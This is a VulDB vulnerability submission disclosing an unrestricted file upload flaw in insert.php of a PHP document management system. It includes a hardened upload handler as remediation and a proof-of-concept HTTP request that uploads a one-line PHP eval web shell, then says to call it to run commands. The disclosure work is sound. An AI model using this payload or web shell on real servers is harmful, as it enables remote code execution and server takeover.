| Title | code-projects document-management-system-in-php-with-source-code v1.0 Unrestricted Upload |
|---|
| Description | # Document Management System In PHP With Source Code v1.0 /insert.php Unrestricted Upload
## Vendor Homepage
https://code-projects.org/
## submitter
mawenjie
## Vulnerable File
- /insert.php
## VERSION(S)
- V1.0
## Software Link
- https://code-projects.org/document-management-system-in-php-with-source-code/
## Vulnerability Type
- Unrestricted Upload
## Root Cause
In Document Management System In PHP With Source Code v1.0, /insert.php handles the file that a logged-in user uploads when adding content to the page. The upload is accepted without any restrictions or filtering, which results in an unrestricted upload vulnerability.
#### The source code is not filtered.
<img width="787" height="395" alt="Image" src="https://github.com/user-attachments/assets/b0344071-d4e4-4d3d-b967-798abafbf58d" />
## Impact
File upload vulnerabilities are extremely harmful. Attackers can upload malicious scripts (such as a web shell) to directly control the server, view, tamper with or delete files, execute system commands, and even create administrator accounts. The server may become a "zombie" and be used for DDoS attacks, sending spam, etc. At the same time, the database is exposed to intrusion, sensitive information such as user privacy and commercial secrets may be stolen or tampered with, and website pages may be maliciously replaced, damaging the platform's reputation. In addition, the vulnerability may become a springboard for attacking other systems, triggering chained security issues and posing multi-dimensional threats to servers, data and users.
# DESCRIPTION
Document Management System In PHP With Source Code v1.0: after logging in, a user can upload a file when adding content to the page. The page index.php references the upload function in /insert.php, which applies no restrictions or filters, resulting in an unrestricted upload vulnerability. Remote attackers can pass malicious payloads through this file upload function, and the unrestricted upload further leads to remote code execution (RCE).
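
A hardened handler for the `uploaded_file` field, as an added example that is not the project's code. The allowed types, size limit, storage directory and the function name `store_upload` are assumptions.

```php
<?php
declare(strict_types=1);

// Assumption: the application only needs these document types.
const ALLOWED_TYPES = [
    'pdf' => 'application/pdf',
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'txt' => 'text/plain',
];
// Assumptions: a directory outside the web root, and a 10 MiB size limit.
const UPLOAD_DIR = '/var/lib/dms-uploads';
const MAX_BYTES  = 10 * 1024 * 1024;

// Validate one $_FILES entry and store it under a server-generated name.
function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('not an upload or too large');
    }
    // The extension comes from the client-supplied name: allowlist it.
    $ext = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        throw new RuntimeException('file type not allowed');
    }
    // Sniff the type from the bytes; the request's Content-Type is ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-chosen name: the client's file name never reaches the disk.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $stored)) {
        throw new RuntimeException('could not store file');
    }
    return $stored;
}

// Usage in the upload handler (field name as in the request on this page).
try {
    $name = store_upload($_FILES['uploaded_file'] ?? []);
} catch (RuntimeException $e) {
    http_response_code(400);
    exit('Upload rejected');
}
```

Because the files are stored outside the web root, they have to be returned through a download script that sends them as attachments, so the web server never interprets an uploaded file as PHP.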
# Vulnerability details and POC
## Payload
```http
POST /insert.php HTTP/1.1
Host: 192.168.126.133:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Length: 1608
Origin: http://192.168.126.133:8088
Connection: keep-alive
Referer: http://192.168.126.133:8088/index.php
Cookie: PHPSESSID=f3p49bjml603prg0rrp6drf5d5
Upgrade-Insecure-Requests: 1
Priority: u=0, i
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field1"
5201-
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="anothercont"
1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="yr"
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field2"
external
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field3"
1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="uploaded_file"; filename="shell.php"
Content-Type: application/octet-stream
<?php @eval($_POST['shell']);?>
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field4"
1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field5"
1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field6"
domesca
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="newco"
1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field7"
henry
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="anotheremp"
1
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8
Content-Disposition: form-data; name="field8"
2025-07-23
------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8--
```
<img width="811" height="424" alt="Image" src="https://github.com/user-attachments/assets/8aff60bd-b8cf-43d3-a8bf-608b8d968d6d" />
#### Obtain the file path from the Burp packet analysis, then access the file to execute commands
<img width="583" height="377" alt="Image" src="https://github.com/user-attachments/assets/12fcd569-82a4-4fc9-b1f0-2c536dcf1e98" />
|
|---|
| Source | ⚠️ https://github.com/XiaoJiesecqwq/CVE/issues/4 |
|---|
| User | Anonymous User |
|---|
| Submission | 2025-07-23 12:09 (9 months ago) |
|---|
| Moderation | 2025-07-25 09:38 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 317585 [code-projects Document Management System 1.0 /insert.php uploaded_file privilege escalation] |
|---|
| Points | 20 |
|---|